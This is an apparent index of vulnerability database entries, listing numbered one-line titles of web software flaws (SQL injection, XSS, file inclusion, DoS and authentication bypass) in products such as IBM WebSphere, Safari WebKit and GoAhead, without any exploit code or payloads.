[56429] GoAhead WebServer websSafeUrl Function Malformed URL NULL Dereference Remote DoS
[56428] GoAhead WebServer sockGen.c socketInputBuffered Function Unspecified Remote Issue
[56427] GoAhead WebServer webs.c Crafted POST Request NULL Pointer Dereference DoS
[56426] GoAhead WebServer Socket Disconnect Remote DoS
[56425] GoAhead WebServer Extra Slash Request Authentication Bypass
[56424] GoAhead WebServer on Windows MS-DOS Device Name Request DoS
[56423] Web File Explorer body.asp file Parameter Arbitrary Remote Code Execution
[56418] Active Web Mail emails.aspx TabOpenQuickTab1 Parameter SQL Injection
[56417] Active Web Mail addressbook.aspx TabOpenQuickTab1 Parameter SQL Injection
[56416] Active Web Mail popaccounts.aspx TabOpenQuickTab1 Parameter SQL Injection
[56396] N/X Web Content Management mass_operations.inc.php c_path Parameter Remote File Inclusion
[56395] N/X Web Content Management datasets.php c_path Parameter Remote File Inclusion
[56394] N/X Web Content Management menu.inc.php c_path Parameter Remote File Inclusion
[56369] HP Multiple Products Embedded Web Server (EWS) Default Blank Management Password
[56358] JBoss Enterprise Application Platform Web Services Crafted Request Arbitrary XML File Disclosure
[56327] Sun Java System Access Manager Policy Agent Web Proxy Server Deployment Container DoS
[56299] Horde Multiple Webmail Local PGP Key Caching Weakness
[56292] Palm Pre WebOS LunaSysMgr Service URL Handling Memory Corruption
[56237] IBM Tivoli Identity Manager Console / Self Service Interface Session Fixation
[56175] Hutscripts PHP Website Script showcategory.php cid Parameter SQL Injection
[56172] Hutscripts PHP Website Script lostpassword.php msg Parameter XSS
[56171] Hutscripts PHP Website Script feedback.php msg Parameter XSS
[56170] Hutscripts PHP Website Script index.php msg Parameter XSS
[56162] IBM WebSphere Application Server (WAS) Web Services Stax XMLStreamWriter XML Encoding Weakness Access Restriction Bypass
[56161] IBM WebSphere Application Server (WAS) JAX-WS Application Crafted Request Access Restriction Bypass
[56159] IBM WebSphere Application Server (WAS) Scheduler Account Report Sample (/scheduler/accountreport) Multiple Parameter XSS
[56158] IBM WebSphere Application Server (WAS) /ApplicationProfileSample/servlet/AccountManagementServlet Multiple Parameter XSS
[56157] IBM WebSphere Application Server (WAS) DynamicQuery/EjbMediatorWeb/ query Parameter XSS
[56156] IBM WebSphere Application Server (WAS) /DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp Multiple Parameter XSS
[56155] IBM WebSphere Application Server (WAS) JAX-WS Web Services Ping and Echo Sample (/scriptwssamplesei/demo) Multiple Parameter XSS
[56154] IBM WebSphere Application Server (WAS) JAX-WS Web Services MTOM Sample (/wssamplemtom/demo) uridef Parameter XSS
[56153] IBM WebSphere Application Server (WAS) /PlantsByWebSphere/servlet/ShoppingServlet Multiple Parameter XSS
[56152] IBM WebSphere Application Server (WAS) /PlantsByWebSphere/servlet/AccountServlet userid Parameter XSS
[56151] IBM WebSphere Application Server (WAS) PlantsByWebSphere Sample URI XSS
[56087] EzWebCalendar Image Upload Arbitrary ASP Code Execution
[56082] EZWebSearch results.php language Parameter XSS
[56053] Webconverger Kiosk Extension file:// URI Handling Unspecified Issue
[55945] SaschArt SasCam Webcam Server XHTTP Module ActiveX Get Method Remote Overflow
[55940] EiffelStudio on Windows IPv6 Listening Mode IPv4 Interface Traffic Disclosure
[55936] Cisco Unified Contact Center Express (CCX) Customer Response Solutions (CRS) Administration Interface Traversal Arbitrary File Manipulation
[55935] PeterConnects Web Server Traversal Arbitrary File Access
[55907] Oracle BEA WebLogic Server Web Services Package HMACOutputLength Signature Spoofing Weakness
[55906] Oracle BEA WebLogic Server Servlet Container Package Unspecified Unauthenticated Remote Issue
[55905] Oracle BEA WebLogic Server WLS Console Package console-help.portal searchQuery Parameter XSS
[55851] Hitachi Web Server Reverse Proxy Unspecified Memory Exhaustion DoS
[55850] Hitachi Web Server SSL Client Certificate Handling Security Bypass
[55806] Microsoft Office Web Components OWC10.Spreadsheet ActiveX msDataSourceObject() Method Memory Corruption
[55800] ENOVIA SmarTeam V5 Web Editor Unauthorized Profile Card Access
[55798] WebGUI Unspecified CSRF
[55750] Related Sites Plugin for Wordpress BTE_RW_webajax.php guid Parameter SQL Injection
[55739] Apple Safari WebKit Numeric Character References Handling Memory Corruption
[55738] Apple Safari WebKit Parent / Top Object Handling Unspecified XSS
[55724] Dillo Web Browser HTTP Content-Type Unspecified Input Weakness
[55723] Dillo Web Browser Http_query Unspecified Overflow
[55721] Amaya Web Browser html2toth.c Multiple Function Overflow
[55720] Amaya Web Browser Xml2thot.c Multiple Function Overflow
[55714] WordPress Forgotten Mail Interface New Password Request User Enumeration
[55699] SAP MaxDB webdbm Multiple Parameter XSS
[55656] Dillo Web Browser Png_datainfo_callback() Function PNG File Handling Overflow
[55655] Sun Java System Web Server ::$DATA Extension Request JSP Resource Disclosure
[55654] MiniWeb HTTP Server GET Request Remote Overflow DoS
[55653] MiniWeb HTTP Server Crafted Request Forced File Download / Source Disclosure
[55651] Microsoft DirectShow Video Streaming ActiveX (msvidctl.dll) IMPEG2TuneRequest DirectX Object Interface Overflow
[55641] COMTREND CT-536/HG-536 Admin Interface NAT Table Description Field Overflow DoS
[55636] DD-WRT Router Admin Interface apply.cgi Multiple CSRF
[55627] WeBid /admin/ST_platforms.php include_path Parameter Remote File Inclusion
[55626] WeBid /admin/ST_countries.php include_path Parameter Remote File Inclusion
[55625] WeBid /admin/ST_browsers.php include_path Parameter Remote File Inclusion
[55624] WeBid cron.php include_path Parameter Remote File Inclusion
[55602] AdminLog Administration Interface Multiple Variable Manipulation Authentication Bypass
[55601] radware AppWall Web Application Firewall (WAF) Management/ Directory Multiple .inc File Direct Request Source Code Disclosure
[55588] Pidgin OSCAR Protocol Implementation Crafted ICQWebMessage Remote DoS
[55587] Apple Safari WebKit servePendingRequests() Function Use-After-Free DoS
[55583] V-webmail includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion
[55582] V-webmail includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion
[55581] V-webmail includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55580] Cisco ASA WebVPN Third Party Login Screen Display Weakness
[55579] V-webmail includes/prepend.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55578] V-webmail includes/pear/File.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55577] Cisco ASA WebVPN URL/HTML Rewriting Hex-encoded /+CSCO+ URI XSS
[55576] V-webmail includes/pear/Log.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55575] Cisco ASA WebVPN /+CSCOL+/cte.js csco_wrap_js Function DOM Wrapper Bypass XSS
[55574] V-webmail includes/pear/System.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55573] V-webmail includes/pear/Console/Getopt.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55572] V-webmail includes/pear/Mail/mimeDecode.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55571] V-webmail includes/pear/XML/Tree.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55570] V-webmail includes/pear/XML/Parser.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55569] V-webmail includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55568] V-webmail includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion
[55551] IBM Tivoli Identity Manager ITIM Console Interface XSS
[55550] IBM Tivoli Identity Manager Self-Service UI Interface XSS
[55518] Sun Java Web Console Unspecified XSS
[55510] BIGACE Web CMS index.php cmd Parameter Traversal Local File Inclusion
[55506] Hyperguard Web Application Firewall (WAF) HTTP Content-Length Header Request DoS
[55486] NETGEAR DG632 cgi-bin/webcm nextpage Parameter Traversal Arbitrary Directory Listing
[55418] KDE Konqueror WebKit JavaScript Garbage Collector Allocation Failure NULL Pointer Arbitrary Code Execution
[55417] KDE Konqueror WebKit CSS attr Function Uninitialized Pointer Issue Arbitrary Code Execution
[55415] KDE Konqueror WebKit SVG Animation Element Use-after-free Arbitrary Code Execution
[55414] WebKit DOM Error Event Recursion Handling Memory Corruption
[55382] Quagga / Zebra Netlink Interface Spoofed Message Local DoS
[55381] GNU C Library (glibc) getifaddrs Function Netlink Interface Spoofed Message Local DoS
[55375] Sqwebmail mime.php Content-Type XSS
[55373] OpenWebmail mime.php Content-Type XSS
[55362] Novell NetWare Enterprise Web Server .bas Filename XSS
[55361] Novell NetWare Enterprise Web Server Malformed Perl Filename XSS
[55350] IBM Rational ClearQuest CQWeb Server Unspecified Credential Disclosure
[55349] IBM Rational ClearQuest CQWeb Server Unspecified XSS
[55348] Cisco Video Surveillance 2500 Series IP Camera Embedded Web Server Unspecified Arbitrary File Access
[55337] Xeneo Web Server GET Request Remote Overflow DoS
[55331] MDG Web Server 4D GET Request Remote Overflow DoS
[55324] Savant Web Server Multiple Percent Request Remote DoS
[55316] phpDatingClub website.php page Parameter XSS
[55304] NETGEAR ProSafe VPN Firewall Web Server Malformed Basic Authorization Header Remote DoS
[55292] phpWebThings fdown.php id Parameter SQL Injection
[55291] AdaptWeb index.php newlang Parameter Traversal Arbitrary File Access
[55290] AdaptWeb a_index.php CodigoDisciplina Parameter SQL Injection
[55267] Taxonomy Manager Module for Drupal Admin Page Interface Multiple Field XSS
[55264] Interspire Website Publisher Arbitrary User Creation CSRF
[55243] Green Dam Web Site Filtering SurfGd.dll Injected URL Handling Remote Overflow
[55242] Apple iPhone / iPod Touch WebKit HTMLSelectElement Object Handling Memory Consumption DoS
[55196] Fretsweb charts.php language Parameter Traversal Arbitrary File Access
[55188] WebNMS report/ReportViewAction.do type Parameter XSS
[55168] Fretsweb song.php hash Parameter SQL Injection
[55167] Fretsweb player.php name Parameter SQL Injection
[55166] Fretsweb admin/common.php Multiple Parameter Traversal Local File Inclusion
[55114] Webmedia Explorer index.php Multiple Parameter XSS
[55111] SWS Web Server Unfinished Line Remote DoS
[55106] Free Joke Script webadmin/includes/security.php Admin Account Password Manipulation
[55096] Compaq Web-Based Management Agent Encoded Traversal File Request Enumeration
[55095] Compaq Web-Based Management Agent Remote Overflow DoS
[55079] IBM WebSphere Multiple Products Migration IsSecurityEnabled Flag Unspecified Repository Information Disclosure
[55078] IBM WebSphere Application Server (WAS) Security Component LTPA Token Timeout Policy Bypass
[55077] IBM WebSphere Application Server (WAS) Administrative Console Component Configservice API Unspecified Information Disclosure
[55076] IBM WebSphere Application Server (WAS) System Management/Repository Component wsadmin Unspecified Issue
[55075] IBM WebSphere Application Server (WAS) Security Component Non-standard HTTP Methods Unspecified Issue
[55074] IBM WebSphere Application Server (WAS) Administrative Console Component Secure Login Page HTTP Access Weakness
[55061] IBM WebSphere MQ Queue Manager Crafted Request Remote Overflow
[55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
[55045] FreeBSD IPv6 SIOCSIFINFO_IN6 IOCTL Unprivileged Interface Property Manipulation
[55027] Apple Safari WebKit JavaScript Application RNG Prediction Weakness
[55023] Apple Safari WebKit Web Inspector HTML Attribute Handling XSS
[55022] Apple Safari WebKit Arbitrary Local Java Applet Access
[55015] Apple Safari WebKit Attr DOM Object Handling Arbitrary Code Execution
[55014] Apple Safari WebKit Transparent Custom Cursor / CSS3 Hotspot Browser UI Element Spoofing
[55013] Apple Safari WebKit SVG Animation Element Set.targetElement() Use-after-free Arbitrary Code Execution
[55012] Apple Safari on Windows Reset Safari Implementation Stored Web Password Persistence
[55009] Apple Safari WebKit Audio / Video HTML Element Handling Information Disclosure
[55008] Apple Safari WebKit JavaScript dir Attribute DOM Handling Use-after-free Arbitrary Code Execution
[55007] phpWebThings help.php module Parameter Traversal Arbitrary File Access
[55006] Apple iPhone / Safari WebKit CSS attr() Function Uninitialized Pointer Issue Arbitrary Code Execution
[55005] Apple Safari WebKit Canvas Redirect Cross-site Image Disclosure
[55004] Apple Safari WebKit Crafted Canvas SVG Cross-site Image Capture
[54996] Apple Safari Web Inspector Page Inspection XSS
[54994] WebKit Drag Event Handling Information Disclosure
[54993] Apple Safari WebKit Location / History Objects XSS
[54992] Apple Safari WebKit XMLHttpRequest Header Handling CRLF Injection
[54991] Apple Safari WebKit Page Transition Frame Content Access XSS
[54989] Apple Safari WebKit Cross-Domain JavaScript Prototype XSS
[54988] Apple Safari WebKit about:blank Security Context Race Condition XSS
[54987] Apple Safari WebKit JavaScript Context Splitting Event Handler Subsequent Frame XSS
[54986] Apple Safari WebKit Script Security Context Association Implementation Failure Unspecified XSS
[54985] Apple Safari WebKit JavaScript Garbage Collector Allocation Failure NULL Pointer Arbitrary Code Execution
[54984] WebKit 'ConstDeclNode::handleSlowCase' Function JavaScript Exception Handling Memory Corruption
[54983] Apple Safari WebKit JavaScript Contexts Separation XSS
[54981] Apple Safari WebKit Same-origin Policy Bypass Subframe Positioning Clickjacking
[54975] Apple Safari WebKit XSLT document() Function Information Disclosure
[54973] Apple Safari WebKit XSLT Redirect Handling Information Disclosure
[54972] Apple Safari WebKit XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
[54928] Kerio MailServer WebMail Component Integration Page XSS
[54894] A-LINK WL54AP3 / WL54AP2 Management Interface Default Admin Account Password
[54888] Web Directory PRO admin/backup_db.php Direct Request Database Backup Disclosure
[54872] Sun Java System Web Server Reverse Proxy Plug-in Unspecified XSS
[54871] Webform Module for Drupal Multiple Parameter Unspecified XSS
[54867] WebEyes Guest Book yorum.asp mesajid Parameter SQL Injection
[54858] Flash Quiz results_table_web.php quiz Parameter SQL Injection
[54857] Flash Quiz high_score_web.php quiz Parameter SQL Injection
[54850] WebCal webCal3_detail.asp event_id Parameter SQL Injection
[54837] IBM WebSphere Application Server (WAS) Traversal Error Page XSS
[54826] Ston3D WebPlayer system.openURL() Function Shell Metacharacter Remote Command Execution
[54816] DMXReady Registration Manager databases/webblogmanager.mdb Direct Request Database Disclosure
[54742] WebMember form.php formID Parameter SQL Injection
[54728] Novell GroupWise gw/webacc Multiple Parameter XSS
[54727] IBM WebSphere Partner Gateway (WPG) bcgarchive Schema DB2 Instance ID Unspecified Remote Information Disclosure
[54678] Profense Web Application Firewall Negative Model Implementation Weakness SCRIPT Element XSS
[54677] Profense Web Application Firewall Encoded Newline Request Positive Model Protection Bypass
[54676] Profense Web Application Firewall Default Password Hash Weakness
[54662] phpWebNews bukutamu.php det Parameter SQL Injection
[54661] phpWebNews index.php id_kat Parameter SQL Injection
[54655] Realty Web-Base list_list.php id Parameter SQL Injection
[54643] Novell GroupWise WebAccess /gw/webacc Login Page Multiple Parameter XSS
[54642] Novell GroupWise WebAccess Mail Service Scripting Attack Authentication Bypass
[54641] Novell GroupWise WebAccess Unfiltered Style Expressions XSS
[54640] Novell GroupWise WebAccess Session Management Mechanism Bypass
[54635] Web Conference Room Free Unspecified XSS
[54626] Open WebMail (OWM) E-mail Multiple Content Header XSS
[54622] webadmin.php show Parameter Arbitrary File Access
[54590] MyABraCaDaWeb Invalid Parameter Error Message Path Disclosure
[54580] ClanWeb admincp/save.php Admin Account Manipulation Access Restriction Bypass
[54555] Microsoft IIS WebDAV Unicode URI Request Authentication Bypass
[54551] ContentKeeper Web .htaccess Misconfiguration Authentication Bypass
[54500] WebKit SVGList::insertItemBefore Function Memory Corruption
[54455] Apple Safari WebKit SVGList Object Handling Memory Corruption
[54436] TinyWebGallery /admin/_include/init.php lang Parameter Traversal Local File Inclusion
[54372] Realty Web-Base admin/admin.php Multiple Parameter SQL Injection
[54367] RTWebalbum index.php AlbumId Parameter SQL Injection
[54310] Webstore Creator admin.asp Multiple Parameter SQL Injection
[54301] dWebPro file.asp::$DATA HTTP Request Handling Arbitrary File Access
[54300] dWebPro HTTP Request Handling Traversal Arbitrary Directory Access
[54296] webSPELL awards.php page Parameter SQL Injection
[54295] webSPELL src/func/language.php language Cookie Local File Inclusion
[54285] ZoneAlarm TrueVector Component Proxied Web Traffic HIDS Module DoS
[54270] AREVA e-terrahabitat WebFGServer Application Unspecified Remote Privilege Escalation
[54268] AREVA e-terrahabitat WebFGServer Application Unspecified Remote DoS (PD32020)
[54267] AREVA e-terrahabitat WebFGServer Application Unspecified Remote DoS (PD32018)
[54254] Glassfish Enterprise Server Admin Console /webService/webServicesGeneral.jsf URI XSS
[54236] IBM WebSphere Application Server (WAS) snoopservlet Path Disclosure
[54233] IBM Tivoli Storage Manager (TSM) Agent Client (dsmagent.exe) WebGUI Unspecified Overflow
[54228] IceWarp Merak Mail Server webmail.php Search Query XML Data SQL Injection
[54217] QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion
[54184] Fritz!Box cgi-bin/webcm Port Forwarding CSRF
[54147] MPC SoftWeb Guestbook mpcsoftweb_guestdata.mdb Direct Request Database Disclosure
[54146] MPC SoftWeb Guestbook insertguest.asp Multiple Parameter XSS
[54136] Precidia Ether232 Web Server GET Request Handling Memory Corruption DoS
[54128] webSPELL picture.php id Parameter Traversal Arbitrary File Access
[54126] @mail webadmin/admin.php Multiple Parameter XSS
[54121] WebPortal CMS indexk.php lib_path Parameter Remote File Inclusion
[54120] WebPortal CMS index.php error Parameter Traversal Local File Inclusion
[54119] WebPortal CMS libraries/helpdocs/help.php lang Parameter Traversal Arbitrary File Access
[54094] CGI Rescue Web Mailer Unspecified CRLF Injection
[54093] Apache ActiveMQ Web Console JMS Message XSS
[54063] DMXReady Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS
[54062] DMXReady Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection
[54019] LooYu Web IM newCusChat.js XSS
[54018] LooYu Web IM newVisitorChat.js XSS
[54000] XBMC xbmc/lib/libGoAhead/WebServer.cpp websHomePageHandler() Function Overflow
[53995] Nokia IPSO Voyager WebGUI readfile.tcl file Parameter Arbitrary File Access
[53990] IBM WebSphere Application Server (WAS) ibm_security_logout Servlet logoutExitPage Feature Arbitrary Site Redirect
[53985] Novell GroupWise WebAccess HTML Attachment Unspecified XSS
[53984] Novell GroupWise WebAccess HTML E-mail Unspecified XSS
[53983] Novell GroupWise WebAccess gw/webacc Multiple Parameter XSS
[53982] Novell GroupWise WebAccess Unspecified Information Disclosure
[53981] Novell GroupWise WebAccess Multiple Unspecified Admin Function CSRF
[53979] IBM WebSphere Application Server (WAS) WebContainer Component Unspecified CRLF Injection
[53937] Novell Teaming Liferay Portal web/guest/home Multiple Parameter XSS
[53935] Xitami Web Server on Windows HTTP Request Connection Saturation Remote DoS
[53923] webClassifieds sAuth Cookie Manipulation Authentication Bypass
[53918] FreeBSD libc db(3) Interface Local Information Disclosure
[53914] Keller Web Admin CMS Public/index.php action Parameter Traversal Local File Inclusion
[53826] EZ Webitor login.php Multiple Parameter SQL Injection
[53799] HR Web Add On mss/index.asp app_username Parameter SQL Injection
[53787] Web File Explorer body.asp id Parameter SQL Injection
[53782] webSPELL Multiple BBCode Tags XSS
[53781] WebCollab User Credential Manipulation CSRF
[53780] WebCollab tasks.php selection Parameter XSS
[53768] Zervit Webserver libz/misc.c http_parse_hex() Function Overflow
[53767] Oracle BEA WebLogic Portal Unspecified Remote Issue
[53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
[53765] Oracle BEA WebLogic Server Plug-ins for Web Servers Unspecified Remote Overflow
[53764] Oracle BEA WebLogic Server Web Services Unspecified Remote Issue
[53763] Oracle BEA WebLogic Server Servlet Container Unspecified Remote Issue (CVE-2009-1002)
[53762] Oracle BEA WebLogic Server Servlet Container Unspecified Remote Issue (CVE-2009-1003)
[53711] Beanwebbs Guestbook /guestbook/admin.php Unrestricted Admin Access
[53710] Beanwebbs Guestbook add.php Multiple Parameter XSS
[53708] FreeWebShop.org includes/startmodules.inc.php lang_file Parameter Traversal Local File Inclusion
[53689] DivX Web Player STRF Chunk Handling Overflow
[53659] IBM BladeCenter Advanced Management Module Admin Interface Arbitrary User Permission Disclosure
[53638] Yellow Duck Weblog include/languages/check.php lang Parameter Traversal Local File Inclusion
[53636] Microsoft ISA Server / Forefront Threat Management Gateway (TMG) Web Proxy TCP State Handling DoS
[53635] XEROX WorkCentre Web Server Unspecified Command Injection
[53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow
[53616] DotNetNuke Website\admin\Sales\paypalipn.aspx Unspecified Parameter XSS
[53610] WebCalendar long.php user_inc Parameter Traversal Arbitrary File Access
[53588] DiViS-Web ActiveView DvsNDKEx.dll ActiveX (ActiveView.cab) Multiple Method Overflow
[53539] GIT gitweb git_search Shell Metacharacter Arbitrary Command Execution
[53538] GIT gitweb git_snapshot / git_object Shell Metacharacter Arbitrary Command Execution
[53536] WowWee Rovio /webcam Unauthenticated RTSP Audio/Video Access
[53493] Alt-N WebAdmin Name Parameter Arbitrary File Access
[53485] Web Wiz Site News /news/news.mdb Direct Request User Database Disclosure
[53465] nweb2fax viewrq.php var_filename Parameter Traversal Arbitrary File Access
[53464] nweb2fax comm.php id Parameter Traversal Arbitrary File Access
[53463] nweb2fax viewrq.php var_filename Parameter Shell Metacharacter Arbitrary Remote Code Execution
[53454] Sybase Enterprise Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure
[53453] Pramati Server on Windows Crafted Request WEB-INF Directory Information Disclosure
[53452] Orion Application Server Crafted Request WEB-INF Directory Information Disclosure
[53451] jo! jo Webserver on Windows Crafted Request WEB-INF Directory Information Disclosure
[53450] HP Application Server on Windows Crafted Request WEB-INF Directory Information Disclosure
[53449] Macromedia JRun Crafted Request WEB-INF Directory Information Disclosure
[53431] IBM Tivoli Storage Manager (TSM) Web Admin Client Unspecified Memory Access Violation Remote DoS
[53424] Web Help Desk Full Name Field XSS
[53423] Web Help Desk Asset No. Field XSS
[53422] Web Help Desk Report Name Field XSS
[53420] WebFileExplorer db.mdb Direct Request Database Disclosure
[53419] OpenGoo Web Link Addition webpage[url] Parameter Arbitrary Code Injection
[53414] Cisco Linksys WRT160N Admin Interface CSRF
[53377] 53KF Web IM msg Parameter XSS
[53372] Uebimiau Webmail demo/pop3/error.php selected_theme Parameter Traversal Arbitrary Directory Enumeration
[53354] talentsoft Web+ webplus.exe Path Disclosure
[53347] WebMod Period File Request Script Source Disclosure
[53346] WebMod parser.cpp auth.w Arbitrary Memory Overwrite
[53345] WebMod Cookie Parameter Handling Remote Overflow
[53344] WebMod GET Request Traversal Arbitrary File Access
[53343] Google Chrome JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness
[53342] Apple Safari JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness
[53341] Mozilla Firefox JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness
[53340] Microsoft IE JavaScript Implementation Web Site Temporary Footprint Spoofing Weakness
[53334] Apple Mac OS X XNU HFS vfs sysctl Interface HFS_SET_PKG_EXTENSIONS Code Path Local Memory Consumption DoS
[53310] Fujitsu-Siemens WebTransactions Unspecified Demo Application XSS
[53308] Apple Safari on Windows WebKit.dll ALINK Attribute Handling Memory Exhaustion DoS
[53291] Azureus WebUI index.tmpl CSRF
[53290] uTorrent WebUI /gui/ Multiple Action CSRF
[53274] IBM WebSphere Application Server (WAS) Username Truncation Authentication Bypass (PK70943)
[53273] IBM WebSphere Application Server (WAS) System Management/Repository Component File Transfer Servlet Remote Information Disclosure (PK59108)
[53272] IBM WebSphere Application Server (WAS) Web Server Plug-in Content Buffering Unspecified DoS (PK63499)
[53271] IBM WebSphere Application Server (WAS) Java Message Service (JMS) IBM Asynchronous I/O Multiple Method DoS (PK64529)
[53270] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Performance Monitoring Infrastructure (PMI) Unspecified DoS (PK64697)
[53269] IBM WebSphere Application Server (WAS) Unspecified JSP Source Code Disclosure (PK23670)
[53268] IBM WebSphere Application Server (WAS) Admin Console Forced Logout Session Hijack (PK74966)
[53267] IBM WebSphere Application Server (WAS) Traversal Arbitrary JSP Inclusion (PQ85045)
[53253] IBM WebSphere Application Server (WAS) Web Services Security Component XML Digital-signature Specification Unspecified Issue
[53252] IBM WebSphere Application Server (WAS) Interim Fix File Permission Weakness
[53251] IBM WebSphere Application Server (WAS) Web Services Security Component JAX-RPC WS-Security UsernameToken Object Validation Unspecified Issue
[53247] Dillo Web Browser SSL Certificate Verification Failure
[53238] HP OpenView Network Node Manager (OV NNM) webappmon.exe Arbitrary Code Execution
[53202] aspWebCalendar calendar/calendar.mdb Direct Request Credentials Disclosure
[53200] Check Point FireWall-1 PKI Web Service Multiple HTTP Header Handling Overflow
[53197] Asbru Web Content Management login.asp url Parameter XSS
[53196] Asbru Web Content Management page.asp id Parameter SQL Injection
[53184] Softwebs Nepal Chat Software Login Name XSS
[53161] Sun Java System Identity Manager Admin Interface Arbitrary User Password Modification
[53147] Cisco ASA5520 WebVPN /+webvpn+/index.html Host HTTP Header XSS
[53093] Web Server Creator news/include/createdb.php langfile Parameter Remote File Inclusion
[53075] GNOME Banshee DAAP Extension apps/web/vs_diag.cgi server Parameter XSS
[53068] WebEdition webEdition/index.php WE_LANGUAGE Parameter Traversal Local File Inclusion
[53066] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) SaveViewToSessionFile Method Overflow
[53002] Amaya Web Browser Script Tags defer Attribute Handling Overflow
[52970] Ipswitch WhatsUp Gold Web Server localhostnull Log Viewer Authentication Bypass
[52969] Ipswitch WhatsUp Gold Web Server Crafted Request ASP File Content Disclosure
[52962] Nokia N95 Browser setAttributeNode Method Web Page Handling DoS
[52951] Xitami Web Server Server Side Includes (SSI) Request Processing Remote Format String
[52950] Xitami Web Server LRWP Request Processing Remote Format String
[52935] Amaya Web Browser CheckUniqueName Function Duplicated Attribute Value Inputs Overflows
[52924] Microsoft IIS WebDAV PROPFIND Method Forced Directory Listing
[52915] WebCit mini_calendar Component Unspecified Format String
[52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
[52849] HP Embedded Web Server (EWS) hp/device/set_config_password.html/config Multiple Parameter CSRF
[52848] HP Embedded Web Server (EWS) hp/device/config_result_YesNo.html/config NetIPChange Request CSRF
[52847] HP Embedded Web Server (EWS) Print Documents Unspecified CSRF
[52829] IBM WebSphere Application Server (WAS) Integrated Solutions Console URI XSS
[52816] Kim Websites login.php Multiple Parameter SQL Injection
[52777] Sitecore CMS Web Service Security Database Information Disclosure
[52769] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified XSS
[52768] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified DoS
[52767] Fujitsu Jasmine2000 Enterprise Edition WebLink Unspecified Overflow
[52766] Fujitsu Jasmine2000 Enterprise Edition WebLink Template HTTP Response Splitting
[52756] Cisco Unified MeetingPlace Web Conferencing Crafted URL Handling Unspecified Admin Authentication Bypass
[52707] Atlassian JIRA Enterprise Edition Webwork 1 Framework Dynamic URL Transformation Security Bypass
[52680] Microsoft IIS httpext.dll WebDav LOCK Method Nonexistent File Request Parsing Memory Exhaustion Remote DoS
[52620] IBM WebSphere Application Server (WAS) WAR File Handling Source Disclosure (PK81387)
[52608] IBM WebSphere Application Server (WAS) for z/OS CSIv2 Identity Assertion / JEB Functionality Unspecified Local Issue
[52607] IBM WebSphere Partner Gateway (WPG) Crafted RosettaNet (aka RNIF) Document Signature Verification Bypass
[52605] IBM WebSphere DataPower XML Security Gateway XS40 Malformed Data over SSL Remote DoS
[52603] IBM WebSphere Application Server (WAS) Web Services JAX-WS Client Cache UsernameToken Disclosure
[52602] IBM WebSphere Application Server (WAS) Security Component Multiple Unspecified Issues (PK71786)
[52601] IBM WebSphere Application Server (WAS) Web Authentication Options Multiple Unspecified Issues (PK71826)
[52600] IBM WebSphere Application Server (WAS) Web Services WSPolicy IDAssertion.isUsed SOAP Message Password Disclosure
[52599] IBM WebSphere Application Server (WAS) on Windows JSP Handling Unspecified Exposure (PK75248)
[52598] IBM WebSphere Application Server (WAS) Unspecified SSL Traffic Routing Weakness
[52597] IBM WebSphere Application Server (WAS) Web Services Security Feature Pack userNameToken Unspecified Exposure
[52596] IBM WebSphere Application Server (WAS) Web Services Security Nonce / Timestamp Expiration Enforcement Weakness
[52595] IBM WebSphere Application Server (WAS) PMI/Performance Tools PerfServlet Multiple Log File Information Disclosure
[52539] Aryanic HighPortal includes/web_search.aspx q Parameter XSS
[52538] Aryanic HighCMS includes/web_search.aspx q Parameter XSS
[52531] IBM WebSphere Process Server (WPS) Admin Console Cluster Configuration File Export Information Disclosure
[52526] WEBJump! news_id.php id Parameter SQL Injection
[52525] WEBJump! portfolio_genre.php id Parameter SQL Injection
[52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness
[52510] Dotclear Administration Interface Unspecified XSS
[52468] IBM WebSphere Application Server (WAS) on Windows Installation Factory logs/instconfigifwas6.log Local Information Disclosure
[52465] Moodle User Editing Interface Unspecified Remote Privilege Escalation
[52402] IBM WebSphere Application Server (WAS) /ibm/console/ URI XSS
[52401] Sofi WebGui hu/modules/reg-new/modstart.php mod_dir Parameter Remote File Inclusion
[52389] Cisco Unified MeetingPlace Web Conferencing Profile Page E-mail Address Field XSS
[52372] Cisco Multiple Wireless Products w/ Webauth Vulnerability Scan Remote DoS
[52369] Academic Web Tools download.php Multiple Parameter XSS
[52368] Academic Web Tools login.php Multiple Parameter XSS
[52367] Academic Web Tools page_arch.php Multiple Parameter XSS
[52366] Academic Web Tools page.php Multiple Parameter XSS
[52347] Cambium Group CMS Web Form Arbitrary Mail Relay
[52345] Easy File Sharing Web Server thumbnail.ghp vfolder Parameter Traversal Arbitrary File Access
[52336] Galatolo WebManager (GWM) Multiple Cookie Manipulation Admin Authentication Bypass
[52297] IBM WebSphere MQ (WMQ) Queue Manager Multiple Authorization Command Local Privilege Escalation
[52295] ZNC Webadmin Module znc.conf QuitMessage Field Security Restriction Bypass
[52276] Multi Languages WebShop Online detail.php name Parameter XSS
